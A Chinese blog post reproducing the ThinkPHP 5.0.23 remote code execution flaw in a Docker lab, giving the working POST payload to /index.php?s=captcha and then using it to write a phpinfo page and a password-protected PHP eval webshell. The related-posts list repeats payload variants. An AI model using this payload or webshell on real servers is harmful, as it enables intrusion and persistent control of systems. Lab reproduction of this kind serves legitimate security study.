Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

已于 2023-11-02 11:09:19 修改
阅读量1.5w 收藏 28
点赞数 6
分类专栏: #Thinkphp版本系列 文章标签: 安全 web安全 https 安全漏洞 web
于 2021-12-08 16:22:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cscscys/article/details/121792631
版权

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

漏洞形成原因

  • 框架介绍:
    ThinkPHP是一款运用极广的PHP开发框架。
  • 漏洞引入:
    其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞如何利用

  • 1、访问靶机地址+端口号 进入首页
  • 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。

漏洞复现过程

  • Kali docker 容器中启动此漏洞环境
    在这里插入图片描述
  • 浏览器访问 Kali 的 ip 地址接上8080端口

在这里插入图片描述

  • Burp抓包修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
    在这里插入图片描述在这里插入图片描述
/index.php?s=captcha		#url后接

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd	#POST传入参数

  • Burp Go 在这里插入图片描述在这里插入图片描述

  • 尝试写入phpinfo

echo "<?php phpinfo(); ?>" > info.php

在这里插入图片描述

  • 成功!
    在这里插入图片描述
  • 写入一句话
echo '<?php eval($_POST[aaa]); ?>' > shell.php	#密码:aaa

在这里插入图片描述

Peanut886886
关注
  • 6
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
HW漏洞集合(二)-thinkphp-yaml版
HWHXY的博客
03-31 1522
HW漏洞集合(二)-yml版 link:ThinkPHP漏洞总结 11. ThinkPHP 5.0.23远程代码执行 name: poc-yaml-thinkphp5023-method-rce rules: - method: POST path: /index.php?s=captcha headers: Content-Type: application/x-www-form-urlencoded body: | _method=__construc
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 884
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
thinkphp 5.0.23 rce 漏洞复现
最新发布
m0_65764670的博客
05-29 292
这里的rce远程命令,此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0​查看适用版本。设置靶机和攻击机IP。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2413
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2124
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8227
ThinkPHP5系列远程代码执行漏洞复现(详细)
bugku-渗透测试1通关 wp
qq_45414878的博客
10-13 4872
bugku 渗透测试1 靶场通关手册,祝你快速通关!
Thinkphp框架漏洞--->5.0.23 RCE
huohaowen的博客
03-01 1465
本篇文章来讲一下thinkphp的框架漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
漏洞扫描工具系列-1.1
04-01
这是漏洞扫描工具系列-1.1,后续我还会出更多的工具和资源,关注我,领取免费工具包
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_41438728的博客
11-20 3847
github:https://github.com/top-think/framework/tree/v5.0.23 入口是在framework-5.0.23\framework-5.0.23\library\think\App.php中app::run(),这里有创建http的请求实例 随后在后面会有路由检查,从这里跟进函数routeCheck。 在路由检查中会到路由类的check方法处,继续跟进。 在check中会有获取当前方法的method \framework-5.0.23\library\thin
ThinkPHP5.0.*版本代码执行漏洞
热门推荐
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_methodMethod方法中,将表单伪装变量对该方法的变量进行...
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
PHP网站漏洞poc,ThinkPHP-5.0.23新的RCE漏洞测试和POC
weixin_29876887的博客
04-02 717
TP5新RCE漏洞昨天又是周五,讨厌周五曝漏洞,还得又得加班,算了,还是先验证一波。新的TP5RCE,据说发现者因为上次的RCE,于是又审计了代码,结果发现的。TP5也成了万人轮啊。测试环境搭建windows下phpstudy,然后下载tp5.0.23到相应的www目录下linux,安装启动apache和php,下载tp5.0.23到相应www目录下mac(本机) 启动apache, 下载tp5....
thinkphp5.0.23 远程代码执行复现
qq_38807738的博客
02-08 7067
漏洞影响版本5.0.23之前的版本 我使用的是vulhub下提供的漏洞环境,如何使用自行百度谷歌。 装好后打开网站如下   使用如下poc,即可实现远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: 你的id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Ge...
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值